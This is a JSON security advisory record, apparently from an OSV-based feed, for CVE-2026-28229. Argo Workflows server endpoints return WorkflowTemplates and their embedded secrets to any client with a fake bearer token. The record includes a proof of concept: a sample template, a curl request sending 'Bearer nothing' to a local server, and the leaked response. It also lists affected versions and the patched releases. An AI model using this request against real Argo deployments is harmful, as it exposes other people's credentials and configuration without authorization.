{"id":"CVE-2026-28229","aliases":["GHSA-56px-hm34-xqj5","BIT-argo-workflows-2026-28229","GO-2026-4678"],"title":"Unauthorized access to Argo Workflows Template","summary":"Unauthorized access to Argo Workflows Template","severity":"high","cvss":7.5,"cvssVector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","vendor":"argoproj","product":"github.com/argoproj/argo-workflows/v3","ecosystem":"go","affected":["github.com/argoproj/argo-workflows/v3 >= 3.7.0, < 3.7.11","github.com/argoproj/argo-workflows/v4 < 4.0.2"],"patched":["github.com/argoproj/argo-workflows/v3 3.7.11","github.com/argoproj/argo-workflows/v4 4.0.2"],"published":"2026-03-11","updated":"2026-09-10","sourceUpdated":"2026-09-10T03:50:37.396004190Z","source":"OSV","sourceUrl":"https://osv.dev/vulnerability/GHSA-56px-hm34-xqj5","references":[{"url":"https://github.com/argoproj/argo-workflows/security/advisories/GHSA-56px-hm34-xqj5"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28229"},{"url":"https://github.com/argoproj/argo-workflows/commit/34afaf9c0c36f1ba8645d483ea4752cfc4a391e8"},{"url":"https://github.com/argoproj/argo-workflows"},{"url":"https://github.com/argoproj/argo-workflows/releases/tag/v3.7.11"},{"url":"https://github.com/argoproj/argo-workflows/releases/tag/v4.0.2"}],"tags":["osv","go"],"epss":0.00652,"epssPercentile":0.4944,"ingestedAt":"2026-09-12T03:13:01.755Z","slug":"CVE-2026-28229","body":"## Overview\n\n### Summary\nWorkflow templates endpoints allow any client to retrieve WorkflowTemplates (and ClusterWorkflowTemplates). Any request with a `Authorization: Bearer nothing` token can leak sensitive template content, including embedded Secret manifests.\n\n### Details\n\nhttps://github.com/argoproj/argo-workflows/blob/b519c9054e66b2f0a25eec06709717bd1362f72e/server/workflowtemplate/workflow_template_server.go#L60-L78\n\nhttps://github.com/argoproj/argo-workflows/blob/b519c9054e66b2f0a25eec06709717bd1362f72e/server/clusterworkflowtemplate/cluster_workflow_template_server.go#L54-L72\n\nInformers use the server’s rest config, so they read using server SA privileges. \n\nhttps://github.com/argoproj/argo-workflows/blob/b519c9054e66b2f0a25eec06709717bd1362f72e/server/workflowtemplate/informer.go#L29-L42\n\nhttps://github.com/argoproj/argo-workflows/blob/b519c9054e66b2f0a25eec06709717bd1362f72e/server/clusterworkflowtemplate/informer.go#L34-L46\n\n### PoC\n1. Create template\n\n```yml\napiVersion: argoproj.io/v1alpha1\nkind: WorkflowTemplate\nmetadata:\n  name: leak-workflow-template\n  namespace: argo\nspec:\n  templates:\n  - name: make-secret\n    resource:\n      action: create\n      manifest: |\n        apiVersion: v1\n        kind: Secret\n        metadata:\n          name: leaked-secret\n        type: Opaque\n        data:\n          password: c3VwZXJzZWNyZXQ=\n```\n\nThen apply that with `kubectl apply -f poc.yml`\n2. Query Argo Server with a fake token\n\n**Result:**\n\n```cmd\n> kubectl apply -f poc.yml\nworkflowtemplate.argoproj.io/leak-workflow-template created\n> curl -sk -H \"Authorization: Bearer nothing\" \\\n    \"https://localhost:2746/api/v1/workflow-templates/argo/leak-workflow-template\"\n{\"metadata\":{\"name\":\"leak-workflow-template\",\"namespace\":\"argo\",\"uid\":\"6f91481c-df9a-4aeb-9fe3-a3fb6b12e11c\",\"resourceVersion\":\"867394\",\"generation\":1,\"creationTimestamp\":\"REDACTED\",\"annotations\":{\"kubectl.kubernetes.io/last-applied-configuration\":\"{\\\"apiVersion\\\":\\\"argoproj.io/v1alpha1\\\",\\\"kind\\\":\\\"WorkflowTemplate\\\",\\\"metadata\\\":{\\\"annotations\\\":{},\\\"name\\\":\\\"leak-workflow-template\\\",\\\"namespace\\\":\\\"argo\\\"},\\\"spec\\\":{\\\"templates\\\":[{\\\"name\\\":\\\"make-secret\\\",\\\"resource\\\":{\\\"action\\\":\\\"create\\\",\\\"manifest\\\":\\\"apiVersion: v1\\\\nkind: Secret\\\\nmetadata:\\\\n  name: leaked-secret\\\\ntype: Opaque\\\\ndata:\\\\n  password: c3VwZXJzZWNyZXQ=\\\\n\\\"}}]}}\\n\"},\"managedFields\":[{\"manager\":\"kubectl-client-side-apply\",\"operation\":\"Update\",\"apiVersion\":\"argoproj.io/v1alpha1\",\"time\":\"REDACTED\",\"fieldsType\":\"FieldsV1\",\"fieldsV1\":{\"f:metadata\":{\"f:annotations\":{\".\":{},\"f:kubectl.kubernetes.io/last-applied-configuration\":{}}},\"f:spec\":{\".\":{},\"f:templates\":{}}}}]},\"spec\":{\"templates\":[{\"name\":\"make-secret\",\"inputs\":{},\"outputs\":{},\"metadata\":{},\"resource\":{\"action\":\"create\",\"manifest\":\"apiVersion: v1\\nkind: Secret\\nmetadata:\\n  name: leaked-secret\\ntype: Opaque\\ndata:\\n  password: c3VwZXJzZWNyZXQ=\\n\"}}],\"arguments\":{}}}\n```\n\n### Impact\nAny client can leaks Workflow Template and Cluster Workflow Template data, including secrets, artifact locations, service account usage, env vars, and resource manifests.\n\n## Affected packages\n\n- `github.com/argoproj/argo-workflows/v3 >= 3.7.0, < 3.7.11`\n- `github.com/argoproj/argo-workflows/v4 < 4.0.2`\n\n## Remediation\n\nUpgrade to a patched release:\n\n- `github.com/argoproj/argo-workflows/v3 3.7.11`\n- `github.com/argoproj/argo-workflows/v4 4.0.2`","depth":"twilight","depthScore":41,"depthScoreParts":{"impact":41.3,"likelihood":0.1,"exploitation":0,"ransomware":0},"changes":[]}